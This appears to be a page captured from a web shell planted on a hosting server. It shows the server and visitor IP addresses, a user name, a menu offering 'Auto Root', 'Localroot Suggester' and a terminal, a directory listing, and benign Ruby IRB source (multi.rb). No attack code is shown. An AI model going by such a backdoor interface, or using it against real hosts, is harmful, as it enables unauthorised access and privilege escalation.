Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby27 /
share /
ruby /
irb /
cmd /
Delete
Unzip
Name
Size
Permission
Date
Action
chws.rb
537
B
-rw-r--r--
2023-03-30 12:34
fork.rb
638
B
-rw-r--r--
2023-03-30 12:34
help.rb
901
B
-rw-r--r--
2023-03-30 12:34
info.rb
559
B
-rw-r--r--
2023-03-30 12:34
load.rb
1.2
KB
-rw-r--r--
2023-03-30 12:34
nop.rb
545
B
-rw-r--r--
2023-03-30 12:34
pushws.rb
677
B
-rw-r--r--
2023-03-30 12:34
subirb.rb
661
B
-rw-r--r--
2023-03-30 12:34
Save
Rename
# frozen_string_literal: false # multi.rb - # $Release Version: 0.9.6$ # $Revision$ # by Keiju ISHITSUKA(keiju@ruby-lang.org) # # -- # # # require_relative "nop" require_relative "../ext/multi-irb" # :stopdoc: module IRB module ExtendCommand class IrbCommand < Nop def execute(*obj) IRB.irb(nil, *obj) end end class Jobs < Nop def execute IRB.JobManager end end class Foreground < Nop def execute(key) IRB.JobManager.switch(key) end end class Kill < Nop def execute(*keys) IRB.JobManager.kill(*keys) end end end end # :startdoc: